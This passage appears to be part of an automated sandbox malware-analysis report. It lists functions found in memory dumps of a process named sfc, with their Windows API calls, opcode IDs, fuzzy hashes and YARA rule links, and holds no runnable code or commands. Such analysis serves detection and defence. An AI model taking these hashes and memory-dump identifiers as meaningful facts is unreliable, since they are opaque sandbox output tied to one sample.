                                                                                                                      • Instruction Fuzzy Hash: 7A31E6B5A40208AFDB14DF99D880EEFB7B9EF8C714F108109F918A7240DB70A811CFA5
                                                                                                                      Function 02AA7A80 Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • NtAllocateVirtualMemory.NTDLL(02A913AE,?,02AA6757,00000000,00000004,00003000,?,?,?,?,?,02AA6757,02A913AE,4D8B511C,02A913AE,00000000), ref: 02AA7B37
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2167126740-0
                                                                                                                      • Opcode ID: 373d7ed562dcf02eac607374093c8c7a6394f6644267429e5629f866888eb908
                                                                                                                      • Instruction ID: d0f8dda985585f805478ab7e7c342d5967c0c5f2c18e1f47d061c6a96dbb49e9
                                                                                                                      • Opcode Fuzzy Hash: 373d7ed562dcf02eac607374093c8c7a6394f6644267429e5629f866888eb908
                                                                                                                      • Instruction Fuzzy Hash: 32211DB1A40208AFDB14DF59DC81EAFB7B9EF88704F008509FD0897240DB75A811CFA5
                                                                                                                      Function 02AA78A0 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: DeleteFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4033686569-0
                                                                                                                      • Opcode ID: 5124bf4b8984e73ccc97a05c76cecb946e3b8b90d29b2799cf4e198b8834b451
                                                                                                                      • Instruction ID: f3ecca79db2ad17b964e033d4fe9976ca19a2d88234bc11f25b4f0954f5d91b4
                                                                                                                      • Opcode Fuzzy Hash: 5124bf4b8984e73ccc97a05c76cecb946e3b8b90d29b2799cf4e198b8834b451
                                                                                                                      • Instruction Fuzzy Hash: 2A0180B2A812047FD620EB68DD55FAB77ADEF89710F004509FB189B280DB7179128BE5
                                                                                                                      Function 02AA7930 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02AA7961
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Close
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3535843008-0
                                                                                                                      • Opcode ID: 47efae5147df12e2a290532262f55778ee760547e7d53fcb4626249dd9ba2729
                                                                                                                      • Instruction ID: 851637dde383d843f7ceb3682df918001fc43b4766665ec24cdeaa6a581d6c23
                                                                                                                      • Opcode Fuzzy Hash: 47efae5147df12e2a290532262f55778ee760547e7d53fcb4626249dd9ba2729
                                                                                                                      • Instruction Fuzzy Hash: 43E04676640214BFD620EA5ACC01F9B776EDFC5760F408415FA08A7241CA71B9118AE1
                                                                                                                      Function 031E4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 7c83a2a8417e0b0cbc1b94269d3d682bb010714b0cdb4f6da3ec2440bd3849f1
                                                                                                                      • Instruction ID: f00587541f07ae35c6866d0ace019cb4f3fe032155ee4456a341ea572162a162
                                                                                                                      • Opcode Fuzzy Hash: 7c83a2a8417e0b0cbc1b94269d3d682bb010714b0cdb4f6da3ec2440bd3849f1
                                                                                                                      • Instruction Fuzzy Hash: B0900231605C04179540B15849845464005D7E5301B55D111E1425554C8B24CA665361
                                                                                                                      Function 031E4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 5f20f7f66068058212d28965c4f120e24425ba9f558ead962485b0f02275fc78
                                                                                                                      • Instruction ID: a777ce064b45142472837a2db46b5754122a244c20c477c411642e1ec7213016
                                                                                                                      • Opcode Fuzzy Hash: 5f20f7f66068058212d28965c4f120e24425ba9f558ead962485b0f02275fc78
                                                                                                                      • Instruction Fuzzy Hash: 9D900261601904474540B15849044066005D7E6301395D215A1555560C8728C9659269
                                                                                                                      Function 031E35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 8012665fc3a1b6eb8c55be546c3764703992deb872b05d405ccef84e914ac571
                                                                                                                      • Instruction ID: b8bdf9151c6281e38b5a87f97b3d6bb8ec7c55275db44a2c8125f1af5dc59d6d
                                                                                                                      • Opcode Fuzzy Hash: 8012665fc3a1b6eb8c55be546c3764703992deb872b05d405ccef84e914ac571
                                                                                                                      • Instruction Fuzzy Hash: A190023160590807D500B15846147061005C7D5201F65D511A1425568D87A5CA6165A2
                                                                                                                      Function 031E2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 8e87e72f605c33a43f17ca32e9bf939780f1e69c9e7cf41a43ae172e4b0a1baa
                                                                                                                      • Instruction ID: 779b6f08b572a1caff6f351ef451c83961350faafb65132d57283b41de62b499
                                                                                                                      • Opcode Fuzzy Hash: 8e87e72f605c33a43f17ca32e9bf939780f1e69c9e7cf41a43ae172e4b0a1baa
                                                                                                                      • Instruction Fuzzy Hash: 9B900261202804074505B1584514616400AC7E5201B55D121E2015590DC735C9A16125
                                                                                                                      Function 031E2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 29a40f4eeb5f596e77bb712c074e1c838529a11d3703de7fc258cda251b3784f
                                                                                                                      • Instruction ID: 93c3588a8241d536fdf99873c2348d5cda7f4a2f0b679a89475ca26ce774e3ae
                                                                                                                      • Opcode Fuzzy Hash: 29a40f4eeb5f596e77bb712c074e1c838529a11d3703de7fc258cda251b3784f
                                                                                                                      • Instruction Fuzzy Hash: 1E90023160580C07D550B15845147460005C7D5301F55D111A1025654D8765CB6576A1
                                                                                                                      Function 031E2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 1cb71f416a950031cba9bcc1be1c0bdffe0ffff3fa70b241cf58ecc996aec398
                                                                                                                      • Instruction ID: a49994fff58547504ab8c5d763ea2437e5d3cd24a341c08a5d47c8b89dde6410
                                                                                                                      • Opcode Fuzzy Hash: 1cb71f416a950031cba9bcc1be1c0bdffe0ffff3fa70b241cf58ecc996aec398
                                                                                                                      • Instruction Fuzzy Hash: C690023120180C07D580B158450464A0005C7D6301F95D115A1026654DCB25CB6977A1
                                                                                                                      Function 031E2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: e327a5baa2cb2a5e67938a55668a4008c6287addc3216aaf47891c849b1450b0
                                                                                                                      • Instruction ID: 5fd48ef630eaaab1b322c828e9318af249117879d5fb7d49f3401d0aa8a47fa7
                                                                                                                      • Opcode Fuzzy Hash: e327a5baa2cb2a5e67938a55668a4008c6287addc3216aaf47891c849b1450b0
                                                                                                                      • Instruction Fuzzy Hash: 6F90023120584C47D540B1584504A460015C7D5305F55D111A1065694D9735CE65B661
                                                                                                                      Function 031E2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 6f8835ab32385e5557f940c650edc5f638bf0e58f2cee742a77178a9617c4dd2
                                                                                                                      • Instruction ID: 1bd701080e2105da5e1dab36ae2e30f1c3b93bc6f33014245281d760825de952
                                                                                                                      • Opcode Fuzzy Hash: 6f8835ab32385e5557f940c650edc5f638bf0e58f2cee742a77178a9617c4dd2
                                                                                                                      • Instruction Fuzzy Hash: DB900435311C04070505F55C07045070047C7DF351355D131F3017550CD731CD715131
                                                                                                                      Function 031E2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: d7ba5bad197d0661c7a9251d5e9dfef56d05ab3c9dc158cbc64ce181ed285be9
                                                                                                                      • Instruction ID: 030eca4c0528291c7c1f450c47538d672e83e7704657feced381ff5f02ba1fc5
                                                                                                                      • Opcode Fuzzy Hash: d7ba5bad197d0661c7a9251d5e9dfef56d05ab3c9dc158cbc64ce181ed285be9
                                                                                                                      • Instruction Fuzzy Hash: C6900225221804070545F558070450B0445D7DB351395D115F2417590CC731C9755321
                                                                                                                      Function 031E39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 7fb7bf2bc7e1304e1dd398690446478708b09fc496578884178b4e8ce84d8379
                                                                                                                      • Instruction ID: 13bf7de5cb7c074d3317f272ed21edada9df2ec990977e058104205b19c95e4e
                                                                                                                      • Opcode Fuzzy Hash: 7fb7bf2bc7e1304e1dd398690446478708b09fc496578884178b4e8ce84d8379
                                                                                                                      • Instruction Fuzzy Hash: 5890022124585507D550B15C45046164005E7E5201F55D121A1815594D8765C9656221
                                                                                                                      Function 031E2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 2b1df527f474ee1881c1c8f6f569880a2fc593ab05057fa4f606d3c6cd00de98
                                                                                                                      • Instruction ID: 5a2ab3a636b0fa9f0cbb174942df007c5e83946b616f7b0e35f4abf21526c7d0
                                                                                                                      • Opcode Fuzzy Hash: 2b1df527f474ee1881c1c8f6f569880a2fc593ab05057fa4f606d3c6cd00de98
                                                                                                                      • Instruction Fuzzy Hash: 6990026134180847D500B1584514B060005C7E6301F55D115E2065554D8729CD626126
                                                                                                                      Function 031E2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 6b24f5caa5d6e3aac926da4f70ad78a055d159f407b1c52dee58f90ac1cad4a4
                                                                                                                      • Instruction ID: a6e058249f410707e9a0a31d64f4f8edfa419dd91f8bb0d7fb9a4186cdbc4a21
                                                                                                                      • Opcode Fuzzy Hash: 6b24f5caa5d6e3aac926da4f70ad78a055d159f407b1c52dee58f90ac1cad4a4
                                                                                                                      • Instruction Fuzzy Hash: 4B900221601804474540B16889449064005EBE6211755D221A1999550D8769C9755665
                                                                                                                      Function 031E2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 44a6d96655167dbc918ec3c7b7664e0f92d3f18140c97aab61a730027df38c6a
                                                                                                                      • Instruction ID: 67d8521ff054ae9f44df70e253ac4418e27e5a8fba4db5658b5c79dca0fdd550
                                                                                                                      • Opcode Fuzzy Hash: 44a6d96655167dbc918ec3c7b7664e0f92d3f18140c97aab61a730027df38c6a
                                                                                                                      • Instruction Fuzzy Hash: FC900221211C0447D600B5684D14B070005C7D5303F55D215A1155554CCB25C9715521
                                                                                                                      Function 031E2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 2d499148317a8a13701f98872154f6742daab7a10037680366a7330ebeff4d91
                                                                                                                      • Instruction ID: e6eab6a45e5f38da2efb3b091563335059f9eb991731b2c76137dfa47dbb3ba9
                                                                                                                      • Opcode Fuzzy Hash: 2d499148317a8a13701f98872154f6742daab7a10037680366a7330ebeff4d91
                                                                                                                      • Instruction Fuzzy Hash: C490022160180907D501B1584504616000AC7D5241F95D122A2025555ECB35CAA2A131
                                                                                                                      Function 031E2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 7d9b40708abd85e686c9c5f0fdab07d7084f0256bd0d9835f3c9ae246b05f5e3
                                                                                                                      • Instruction ID: c9b01f875edd39b1e5b38a13f21b4b378345bf05c13d19f78d6f69b7c0602e55
                                                                                                                      • Opcode Fuzzy Hash: 7d9b40708abd85e686c9c5f0fdab07d7084f0256bd0d9835f3c9ae246b05f5e3
                                                                                                                      • Instruction Fuzzy Hash: 0E900261201C0807D540B55849046070005C7D5302F55D111A3065555E8B39CD616135
                                                                                                                      Function 031E2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 2bc6fee8d2128f228479a2bfb25bdf6600ab051ee8347b201a06bddae70dd742
                                                                                                                      • Instruction ID: 839f60cb4c9f9e1faf5461a4091d4aab3af4eaa2f27f33e29ab966868b3ac0aa
                                                                                                                      • Opcode Fuzzy Hash: 2bc6fee8d2128f228479a2bfb25bdf6600ab051ee8347b201a06bddae70dd742
                                                                                                                      • Instruction Fuzzy Hash: 3B90022921380407D580B158550860A0005C7D6202F95E515A1016558CCB25C9795321
                                                                                                                      Function 031E2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: ee05cf8a04ea2846973e734d2a8375169487c27bae3f237d0b2ed8667a5da9d0
                                                                                                                      • Instruction ID: 3c71f89cf8f897bbc02cbfa69ebbb7a2a4280c06f1ff91410854e36e0e557fbf
                                                                                                                      • Opcode Fuzzy Hash: ee05cf8a04ea2846973e734d2a8375169487c27bae3f237d0b2ed8667a5da9d0
                                                                                                                      • Instruction Fuzzy Hash: 8690022130180407D540B15855186064005D7E6301F55E111E1415554CDB25C9665222
                                                                                                                      Function 031E2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 8d811da62935c2993ee1ec1e6bbdf75acfc1c33a752b16a899c5e4d33003dc42
                                                                                                                      • Instruction ID: 3c62a79b16a44db1e38db2dcdefa3d5dadde79adb22186f97db91116556ace41
